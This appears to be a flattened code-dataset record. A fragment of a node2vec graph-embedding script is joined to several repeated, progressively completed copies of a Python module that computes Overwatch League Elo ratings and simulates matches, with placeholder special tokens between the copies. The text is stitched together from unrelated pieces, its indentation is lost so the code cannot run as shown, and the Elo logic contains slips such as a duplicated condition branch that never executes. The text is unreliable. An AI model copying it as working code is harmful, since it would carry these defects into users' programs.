Default is 1.')\n parser.add_argument('--weighted', dest='weighted', action='store_true', help='Boolean specifying (un)weighted. Default is unweighted.')\n parser.add_argument('--unweighted', dest='unweighted', action='store_false')\n parser.set_defaults(weighted=False)\n parser.add_argument('--directed', dest='directed', action='store_true', help='Graph is (un)directed. Default is undirected.')\n parser.add_argument('--undirected', dest='undirected', action='store_false')\n parser.set_defaults(directed=False)\n return parser.parse_args()\n\ndef read_graph():\n if args.weighted:\n G = nx.read_edgelist(args.input, nodetype=int, data=(('weight', float), ), create_using=nx.DiGraph)\n else:\n G = nx.read_edgelist(args.input, nodetype=int, create_using=nx.DiGraph())\n for edge in G.edges():\n G[edge[0]][edge[1]]['weight'] = 1\n\n if not args.directed:\n G = G.to_undirected()\n\n return G\n\ndef learning_walks(walks):\n walks = [list(map(str, walk)) for walk in walks]\n model = Word2Vec(walks, size=args.dimensions, window=args.window_size, min_count=0, sg=1, workers=args.workers, iter=args.iter)\n model.wv.save_word2vec_format(args.output)\n return model\n\ndef main(args):\n nx_G = read_graph()\n G = node2vec_walk(nx_G, args.directed, args.p, args.q)\n G.preprocess_transition_probs()\n walks = G.simulate_walks(args.num_walks, args.walk_length)\n model = learning_walks(walks)\n\n _embeddings = {}\n for v in nx_G.nodes():\n _embeddings[str(v)] = model.wv[str(v)]\n\n plot_embeddings(_embeddings, args.label_file)\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n\n\n", "step-ids": [ 7, 8, 12, 13, 15 ] }
[ 7, 8, 12, 13, 15 ]
<|reserved_special_token_0|> class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. 
standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / 
(map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) <|reserved_special_token_0|> <|reserved_special_token_0|> def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. 
""" types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. 
getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> <|reserved_special_token_0|> class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def 
makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 
self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. 
fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type 
can be regular, or playoffs. It is assumed team1 is the higher seed. """ types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. 
getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> <|reserved_special_token_0|> start_elo = 0 decay_factor = 0.9 k = 30 d = 200 overall_weight = 0.6 maptype_weight = 0.2 mapname_weight = 0.2 teams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN', 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS' ] maptypes = ['control', 'assault', 'hybrid', 'escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony', 'temple-of-anubis', 'hanamura', 'numbani', 'eichenwalde', 
'kings-row', 'dorado', 'gibraltar', 'rialto'] colorrequests = requests.get('https://api.overwatchleague.com/teams', timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. 
standings[t]['l'], 'd': season.standings[t]['d']} for t in teams} def calculateElos(self): def applyStageDecay(): for t in teams: self.overall_elos[t] *= decay_factor for m in mapnames: self.mapname_elos[t][m] *= decay_factor for m in maptypes: self.maptype_elos[t][m] *= decay_factor for i in range(4): stage = self.matchdata['stages'][i] applyStageDecay() for t in teams: self.elorecords[t][i].append(self.overall_elos[t]) for match in (stage['regular'] + stage['playoffs']): if not match['completed']: continue t1, t2 = match['t1'], match['t2'] if i == 3: self.stage4played[t1] += 1 self.stage4played[t2] += 1 if match in stage['regular']: if len([x for x in match['maps'] if x['result'] == 't1'] ) > len([x for x in match['maps'] if x['result'] == 't2']): self.standings[t1]['w'] += 1 self.standings[t2]['l'] += 1 else: self.standings[t1]['l'] += 1 self.standings[t2]['w'] += 1 for map in match['maps']: t1_elo = self.overall_elos[t1 ] * overall_weight + self.mapname_elos[t1][map[ 'mapname']] * mapname_weight + self.maptype_elos[t1][ map['maptype']] * maptype_weight t2_elo = self.overall_elos[t2 ] * overall_weight + self.mapname_elos[t2][map[ 'mapname']] * mapname_weight + self.maptype_elos[t2][ map['maptype']] * maptype_weight exp_t1 = 1 / (1 + 10 ** ((t2_elo - t1_elo) / d)) exp_t2 = 1 / (1 + 10 ** ((t1_elo - t2_elo) / d)) act_t1 = 1 if map['result'] == 't1' else 0 if map['result' ] == 't2' else 0.5 act_t2 = 1 if map['result'] == 't2' else 0 if map['result' ] == 't1' else 0.5 self.map_draws[map['mapname']][0 ] += 1 if act_t1 == 0.5 else 0 self.map_draws[map['mapname']][1] += 1 if match in stage['regular']: self.standings[t1]['d'] += 1 if map['result' ] == 't1' else -1 if map['result'] == 't2' else 0 self.standings[t2]['d'] += 1 if map['result' ] == 't2' else -1 if map['result'] == 't1' else 0 MoV = 1 elo_dif = 0 if act_t1 == 1: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif act_t2 == 1: MoV = (map['deaths'][t1] + 1) / 
(map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t2] + 1) / (map['deaths'][t1] + 1) elo_dif = t1_elo - t2_elo elif t1_elo > t2_elo: MoV = (map['deaths'][t1] + 1) / (map['deaths'][t2] + 1) elo_dif = t2_elo - t1_elo self.margins_of_victory.append(MoV) mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[t1] += t1_change self.maptype_elos[t1][map['maptype']] += t1_change self.mapname_elos[t1][map['mapname']] += t1_change self.overall_elos[t2] += t2_change self.maptype_elos[t2][map['maptype']] += t2_change self.mapname_elos[t2][map['mapname']] += t2_change self.elorecords[t1][i].append(self.overall_elos[t1]) self.elorecords[t2][i].append(self.overall_elos[t2]) def getMapType(self, name): types = {**dict.fromkeys(['hanamura', 'horizon-lunar-colony', 'temple-of-anubis', 'volskaya', 'paris'], 'assault'), **dict. fromkeys(['dorado', 'junkertown', 'rialto', 'route-66', 'gibraltar', 'Havana'], 'escort'), **dict.fromkeys([ 'blizzard-world', 'eichenwalde', 'hollywood', 'kings-row', 'numbani'], 'hybrid'), **dict.fromkeys(['busan', 'ilios', 'lijiang', 'nepal', 'oasis'], 'control')} return types[name] def predictMatch(self, team1, team2, maps, loops=10000): results = {} team1wins = 0 maptypes = list(map(self.getMapType, maps)) for x in range(loops): team1score = 0 team2score = 0 for i in range(len(maps)): drawchance = self.map_draws[maps[i]][0] / self.map_draws[maps [i]][1] elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][maps[i] ] * mapname_weight + self.maptype_elos[team1][maptypes[i] ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][maps[i] ] * mapname_weight + self.maptype_elos[team2][maptypes[i] ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) if random_roll < team1winchance - drawchance / 2: team1score += 1 
elif random_roll < team1winchance + drawchance / 2: pass else: team2score += 1 if team1score == team2score: map5 = random.choice([m for m in ['ilios', 'busan', 'lijiang'] if m not in maps]) elo1 = self.overall_elos[team1 ] * overall_weight + self.maptype_elos[team1]['control' ] * maptype_weight + self.mapname_elos[team1][map5 ] * mapname_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.maptype_elos[team2]['control' ] * maptype_weight + self.mapname_elos[team2][map5 ] * mapname_weight if random.random() < 1 / (1 + 10 ** ((elo2 - elo1) / d)): team1score += 1 else: team2score += 1 scoreline = '{}-{}'.format(team1score, team2score) if scoreline not in results: results[scoreline] = 0 results[scoreline] += 1 if team1score > team2score: team1wins += 1 results = {s: (results[s] / loops) for s in results} return results, team1wins / loops def simulateSingleMatch(self, team1, team2, maps, type='regular', updateelos=True, firstto=4): """ Type can be regular, or playoffs. It is assumed team1 is the higher seed. 
""" types = [self.getMapType(m) for m in maps] score = [0, 0] def simulateMap(mapname, maptype): elo1 = self.overall_elos[team1 ] * overall_weight + self.mapname_elos[team1][mapname ] * mapname_weight + self.maptype_elos[team1][maptype ] * maptype_weight elo2 = self.overall_elos[team2 ] * overall_weight + self.mapname_elos[team2][mapname ] * mapname_weight + self.maptype_elos[team2][maptype ] * maptype_weight random_roll = random.random() team1winchance = 1 / (1 + 10 ** ((elo2 - elo1) / d)) drawchance = self.map_draws[mapname][0] / self.map_draws[mapname][1 ] * min(team1winchance, 1 - team1winchance) * 2 if random_roll < team1winchance - drawchance / 2: act_t1, act_t2 = 1, 0 elif random_roll < team1winchance + drawchance / 2: act_t1, act_t2 = 0.5, 0.5 else: act_t1, act_t2 = 0, 1 if updateelos: MoV = random.choice(self.margins_of_victory) exp_t1 = 1 / (1 + 10 ** ((elo2 - elo1) / d)) exp_t2 = 1 / (1 + 10 ** ((elo1 - elo2) / d)) if act_t1 == 1: elo_dif = elo1 - elo2 elif act_t2 == 1: elo_dif = elo2 - elo1 elif elo1 > elo2: elo_dif = elo1 - elo2 elif elo1 > elo2: elo_dif = elo2 - elo1 else: elo_dif = 0 mult = math.log(1 + MoV) * 1 / (elo_dif * 0.001 + 1) t1_change = k * (act_t1 - exp_t1) * mult t2_change = k * (act_t2 - exp_t2) * mult self.overall_elos[team1] += t1_change self.maptype_elos[team1][maptype] += t1_change self.mapname_elos[team1][mapname] += t1_change self.overall_elos[team2] += t2_change self.maptype_elos[team2][maptype] += t2_change self.mapname_elos[team2][mapname] += t2_change return round(act_t1), round(act_t2) if type == 'regular': for i in range(len(maps)): score1, score2 = simulateMap(maps[i], types[i]) score[0] += score1 score[1] += score2 if score[0] == score[1]: map5 = random.choice([x for x in mapnames if self. 
getMapType(x) == 'control' and x not in maps]) score1, score2 = simulateMap(map5, 'control') score[0] += score1 score[1] += score2 if score[0] > score[1]: self.standings[team1]['w'] += 1 self.standings[team2]['l'] += 1 else: self.standings[team1]['l'] += 1 self.standings[team2]['w'] += 1 self.standings[team1]['d'] += score[0] - score[1] self.standings[team2]['d'] += score[1] - score[0] if type == 'playoffs': mappreferences = {t: {mt: [x for x in postseasonmappool if self .getMapType(x) == mt] for mt in maptypes} for t in [team1, team2]} for t in [team1, team2]: for mt in maptypes: mappreferences[t][mt].sort(key=lambda x: self. mapname_elos[t][x] - self.mapname_elos[{team1: team2, team2: team1}[t]][x], reverse=True) mapprogression = ['control', 'hybrid', 'assault', 'escort'] scores = [0, 0] mnum = 0 played = [] picker = team1 while max(score) < firstto: mtype = mapprogression[mnum % 4] mname = [m for m in mappreferences[picker][mtype] if m not in played][0] played.append(mname) mnum += 1 score1, score2 = simulateMap(mname, mtype) if score1 == 1: picker = team2 score[0] += 1 elif score2 == 1: picker = team1 score[1] += 1 if score[0] > score[1]: return [team1, team2] else: return [team2, team1] return <|reserved_special_token_1|> import json, requests, math, random start_elo = 0 decay_factor = 0.9 k = 30 d = 200 overall_weight = 0.6 maptype_weight = 0.2 mapname_weight = 0.2 teams = ['ATL', 'BOS', 'CDH', 'DAL', 'FLA', 'GZC', 'HZS', 'HOU', 'LDN', 'GLA', 'VAL', 'NYE', 'PAR', 'PHI', 'SFS', 'SEO', 'SHD', 'TOR', 'VAN', 'WAS' ] maptypes = ['control', 'assault', 'hybrid', 'escort'] mapnames = ['Havana', 'temple-of-anubis', 'kings-row', 'hanamura', 'gibraltar', 'numbani', 'volskaya', 'hollywood', 'dorado', 'nepal', 'route-66', 'lijiang', 'ilios', 'eichenwalde', 'oasis', 'horizon-lunar-colony', 'junkertown', 'blizzard-world', 'rialto', 'busan', 'paris'] postseasonmappool = ['lijiang', 'ilios', 'busan', 'horizon-lunar-colony', 'temple-of-anubis', 'hanamura', 'numbani', 
'eichenwalde', 'kings-row', 'dorado', 'gibraltar', 'rialto'] colorrequests = requests.get('https://api.overwatchleague.com/teams', timeout=10).text colordata = json.loads(colorrequests)['competitors'] class EloCalculations: def __init__(self): self.teamcolors = {} for teamdata in colordata: c = teamdata['competitor'] self.teamcolors[c['abbreviatedName']] = ['#' + c['primaryColor' ], '#' + c['secondaryColor']] self.matchdata = json.loads(open('data.json', 'r').read()) self.overall_elos = {t: start_elo for t in teams} self.maptype_elos = {t: {m: start_elo for m in maptypes} for t in teams } self.mapname_elos = {t: {m: start_elo for m in mapnames} for t in teams } self.elorecords = {t: [[], [], [], []] for t in teams} self.stage4played = {t: (0) for t in teams} self.map_draws = {m: [0, 0] for m in mapnames} self.standings = {t: {'w': 0, 'l': 0, 'd': 0} for t in teams} self.margins_of_victory = [] def makeCopy(self, season): self.overall_elos = {t: season.overall_elos[t] for t in teams} self.maptype_elos = {t: {m: season.maptype_elos[t][m] for m in maptypes} for t in teams} self.mapname_elos = {t: {m: season.mapname_elos[t][m] for m in mapnames} for t in teams} self.map_draws = {m: [season.map_draws[m][0], season.map_draws[m][1 ]] for m in mapnames} self.margins_of_victory = [x for x in season.margins_of_victory] self.standings = {t: {'w': season.standings[t]['w'], 'l': season. 
